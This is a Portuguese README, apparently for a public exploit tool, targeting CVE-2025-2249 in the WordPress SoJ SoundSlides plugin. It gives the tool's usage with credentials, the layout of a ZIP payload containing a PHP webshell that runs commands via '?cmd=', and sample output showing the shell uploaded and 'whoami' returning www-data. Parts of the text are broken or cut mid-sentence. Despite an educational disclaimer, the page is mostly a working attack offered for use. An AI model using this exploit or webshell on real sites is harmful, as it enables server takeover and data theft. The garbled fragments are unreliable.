
O plugin SoJ SoundSlides para WordPress <= 1.2.2 é vulnerável a Upload Arbitrário de Arquivos.
⚠️ AVISO: Este exploit é apenas para fins educacionais e testes autorizados.
O plugin SoJ SoundSlides permite que usuários autenticados com funções de Contribuidor ou superior façam upload de arquivos ZIP arbitrários. Devido à falta de validação, atacantes podem carregar webshells PHP que são extraídos e executados a partir de um diretório acessível pela web.
Um atacante com credenciais WordPress válidas pode:
?cmd=)usage: CVE-2025-2249.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,
options:
-h, --help show this help message and exit
-u, --url URL WordPress base URL
-un, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
| Argumento | Descrição |
|---|---|
-u | URL base do WordPress |
-un | Nome de usuário do WordPress |
-p | Senha do WordPress |
readme.txt do pluginnxploit/
├── index.html
├── data/
│ └── data.xml
├── audio/
│ └── audio.mp3
└── nxploit.php ← PHP shell (?cmd=)
[*] Checking plugin version...
[+] Vulnerable version detected.
[*] Logging in...
[+] Login successful.
[*] Uploading shell...
[*] Shell uploaded: http://target/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php
> whoami
www-data
wp-content/uploads/ para arquivos .php inesperadosFeito com ❤️ por [Nxploited | Khaled ALenazi]
Para educação, conscientização e defesa.
A segurança é responsabilidade de todos. Sempre teste eticamente, relate com responsabilidade e proteja a web.